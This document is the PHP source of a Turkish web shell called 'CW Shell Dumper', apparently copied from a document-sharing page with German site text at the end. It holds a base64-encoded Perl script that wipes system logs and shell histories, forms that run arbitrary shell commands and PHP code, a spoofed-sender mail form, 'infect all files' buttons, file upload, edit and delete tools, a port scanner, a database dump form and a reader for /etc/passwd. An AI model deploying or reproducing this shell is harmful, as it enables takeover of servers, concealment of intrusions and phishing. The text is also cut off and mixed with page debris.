QGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBc
IlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50
IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3Mg
ZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0
IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNl
bGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBc
IlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAg
ICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAg
IGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJ
CQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0K
ICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRo
ZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51
eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAg
cHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAg
ICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYo
JGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVs
c2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAg
ICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93
aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVj
dGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwi
WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAg
ICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11M
b2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1d
RXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAg
ICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBz
dGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxc
blwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxv
Z3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAk
bSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3Vj
Y2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3Jc
IjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBl
cSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFj
a2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAg
ICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxc
blwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJp
eDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBE
ZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAg
ICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0
aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9l
dGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwi
L2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dz
L2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xv
Y2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNo
ZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIv
dmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUv
ZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hl
L2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xv
Zy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2Fj
Y2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIv
d3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBv
cGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3Jf
bG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xv
Z3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91
c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBk
L2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJp
YW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJv
ci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9s
b2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAg
IHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xv
Zy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAg
IEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUv
bG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAg
PSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19s
b2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9n
cyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0
ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xv
Z1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXgg
PSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBc
IiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIv
dmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Iv
c3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9n
XCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwg
XCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9n
XCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAg
ICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBh
aXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1w
XCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dc
IiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAg
ICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3Vy
aXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwi
LCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAg
ICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIv
dmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwi
L3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwN
CiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIv
dmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dc
IiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dc
IiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAg
ICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAg
ICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2Fm
L3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxp
bnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1
bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3No
X2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jv
b3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAg
ICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwi
L3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2Fw
YWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBc
Ii91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZl
cmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9n
L3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9m
dHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAg
ICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xv
Z1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBc
Ii9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBc
Ii92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIv
dmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhv
cml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25l
d3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9n
L25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIs
DQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9u
ZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAg
ICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNl
XCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9y
c1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAg
ICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRf
bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwi
L3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIp
DQogICAgICAgICB9DQogICAgICAgICANCiAgIA==");
$openp = fopen("logseraser.pl", "w+")or die("Error");
fwrite($openp, $erase)or die("Error");
fclose($openp);
$aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
unlink("logseraser.pl");
echo "</textarea>";
}
if(isset($_POST['commex']))
{
echo "<tr><td>
<center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
<input name=cmd size=20 type=text>
<select name=functionz>
<option>passthru</option>
<option>popen</option>
<option>exec</option>
<option>shell_exec</option>
<option>system</option>
</select><br><input type='submit' name='cmdex' value='Enter'></table>";
}
if(isset($_POST['cmdex']))
{ echo "<tr><td>";
switch (@$_POST['functionz']) {
case "system":
system(stripslashes($_POST['cmd']));
break;
case "popen":
$handle = popen($_POST['cmd'].' 2>&1', 'r');
echo "'$handle'; " . gettype($handle) . "\n";
$read = fread($handle, 2096);
echo $read;
pclose($handle);
break;
case "shell_exec":
shell_exec(stripslashes($_POST['cmd']));
break;
case "exec":
exec(stripslashes($_POST['cmd']));
break;
case "passthru":
passthru(stripslashes($_POST['cmd']));
}
}
elseif(isset($_POST['mail']))
{
echo "<form method='post' action=''>
<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onayl]</font>
</center>
<center><font face='Verdana' size='1'>Kime:<br>
<input type='text' size='19' name='mto'><br>
Kimden:<br>
<input type='text' size='19' name='mfrom'><br>
Konu:<br>
<input type='text' size='19' name='mobj'><br>
Mesaj:<br>
<textarea name='mtext' cols=20 rows=4></textarea><br>
<br><input type='submit' value='Yolla' name='senm'>
</form></table><br>";}
if(isset($_POST['senm']))
{
//Mail With HTML <- webcheatsheet.com
$to = $_POST['mto'];
$subject = $_POST['mobj'];
$contentz = $_POST['mtext']."<!--";
$random_hash = md5(date('r', time()));
$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$rand
om_hash."\"";
ob_start();
?>
--PHP-alt-<?php echo $random_hash; ?>
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<? echo "$contentz"; ?>
--PHP-alt-<?php echo $random_hash; ?>-<?
$message = ob_get_clean();
$mail = @mail( $to, $subject, $message, $headers );
if($mail) { echo "<br><td valign=top>
<center><font color='green' size='1'>Mail Sent</font></center></table>"; }
else { echo "<br><td valign=top>
<center><font color='red' size='1'>Error</font></center></table>"; }
}
elseif(isset($_POST['encoder'])) {
//Encoder
echo "<form method='post' action=''><td valign=top>
<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></t
extarea><br><input type='submit' value='Encode' name='encode'></form></table>";
}
if(isset($_POST['encode'])) { echo "<td valign=top>
<center><font face='Verdana' size='1'>
MD5:     <input type='text' size='35' value='".md5($_POST[
'encod'])."'><br>
Sha1:    <input type='text' size='35' value='".sha1($_POST['enco
d'])."'><br>
Crc32:    <input type='text' size='34' value='".crc32($_POST['enc
od'])."'><br><br>
Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod
'])."'><br>
Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod
'])."'></table>";}
//File List
echo "</table><table width=100%><tr><td>
<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and
$pahtw directory] </font></center></td></tr></table>
<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
<font size='1'>
<td valign=top><font face='Verdana' size='2'><b>Dosya Ad :</b></font></td><td val
ign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top widt
h=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=
10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
</table></center>";
echo "
<br>
<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr>
<td valign=top>
<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></
b>";
if(!isset($phpeval))
{
echo "
<textarea name=php_eval cols=100 rows=5></textarea><br>
<input type='submit' value='Calistir!'>
</form>
";
}
if(isset($phpeval)) {
echo "
<textarea name=php_eval cols=100 rows=10>";
$wr = '"';
$eval = @str_replace("<?","",$phpeval);
$eval = @str_replace("?>","",$phpeval);
@eval($eval);
echo "</textarea><br><input type='submit' value='Calistir!'></form>";
}
echo "<form method='post' action=''><input type='submit' value='Infect All Files
!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalin
fect'><br>";
if(isset($textzz)) { echo $textzz; }
if(isset($textz0)) { echo $textz0; }
echo "</center></form></td></tr><tr><td>
<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
<input type='text' name='editfile' value=".$dir.">
<input type='submit' value='Go' name='doedit'>
</form>";
// Edit Files n3xpl0rer
if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
{
$file = $_POST['editfile'];
$content = file_get_contents($file);
echo "<form action='' method='post'><center>
<input type='hidden' name='editfile' value='".$file."'>
<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textare
a><br /><input type='submit' name='edit' value='Edit'></form>";
}
if(isset($_POST['edit'])) {
$file = $_POST['editfile'];
echo $file."<br />";
$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>")
;
fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: canno
t write to file</font>");
fclose($fh);
echo "Done.</td></tr>";
}
echo "
</table>
<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
<tr>
<td valign=top>
<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
<form name='directory' method='post' action=''>
<input type='text' name='dir' value=$dir>
<input type='submit' value='Go'>
</form></td><td>
<center><b><font size='2' face='Verdana'> Port Tarayc <br></font></b>
<form name='scanner' method='post'>
<input type='text' name='host' value='127.0.0.1' >
<select name='protocol'>
<option value='tcp'>tcp</option>
<option value='udp'>udp</option>
</select>
<input type='submit' value='Portlar TARA'>
</form>
";
if(isset($host) && isset($proto))
{
echo "<font size='2' face='Verdana'>Open Ports:";
for($current = 0; $current <= 23; $current++)
{
$currents = $myports[$current];
$service = getservbyport($currents, $proto);
// Try to connect to port
$result = fsockopen($host, $currents, $errno, $errstr, 1);
// Show results
if($result)
{
echo "$currents, ";
}
}
}
echo "</font>
</td></tr>
<tr>
<td valign=top width=50%>
<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
<form method='post' action='' enctype='multipart/form-data'>
<input type='hidden' name='dare' value=$dir>
<input type='file' name='ffile'>
<input type='submit' name='ok' value='Upload!'>
</center>
</form>
</td>
<td valign=top>
<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
<input type='text' name='delete' value=$dir > <input type='submit' value='Dos
yay Sil' name='deletfilez'>
</center>
</form>
</td></tr>
<tr>
<td valign=top>
<center><b><font size='2' face='Verdana'>Klasr Olutur<br></font></b>
<input type='text' name='makedir' value=$dir> <input type='submit' value='Olut
ur'>
</center>
</form>
</td>
<td valign=top>
<center><b><font size='2' face='Verdana'>Klasr Sil<br></font></b>

<input type='text' name='deletedir' value=$dir> <input type='submit' value='S
il'>
</center>
</form>
</td></tr>
<tr>
<center><b><font size='2' face='Verdana'>Dosya Olutur:<br></font></b>
<input type='hidden' name='darezz' value=$dir>
<font size='1' face='Verdana'>ADI:</font><br>
<input type='text' name='names' size='30'><br>
<font size='1' face='Verdana'>Kodu:</font><br>
<textarea rows='16' cols='30' name='source'></textarea><br>
<input type='submit' value='Upload'>
</center>
</form>
</td>
<center><b><font size='2' face='Verdana'>Database<br></font></b>
<font size='1' face='Verdana'>Username: - Password:</font><br>
<input type='text' name='user' size='10'>
<input type='text' name='passd' size='10'><br>
<font size='1' face='Verdana'>Host:</font><br>
<input type='text' name='host' value='localhost'><br>
<font size='1' face='Verdana'>DB Name:</font><br>
<input type='text' name='db'><br>
<font size='1' face='Verdana'>Sorgu:</font><br>
<textarea rows='10' cols='30' name='query'></textarea><br>
<input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='su
bmit' name='dump' value='Database'yi Dump Et'>
</center>
</form>
</td> </tr>
</table>
</table>
<br />
<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
<tr>
<td valign=top>
<center><b><font size='1' face='Verdana'>
CW Exploiter TIM // Cyber Security
</center></font></td></tr>
</body>
</html>";
?>

CW Shell Dumper

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

CW Shell Dumper

Hochgeladen von

Copyright:

Verfügbare Formate

<?

//Infect Files [Eval]

'filew' value='/etc/passwd'> <input type='submit' value='Dosyay Oku' name='redfi'

<center><b><font size='2' face='Verdana'>Klasr Sil<br></font></b>

Das könnte Ihnen auch gefallen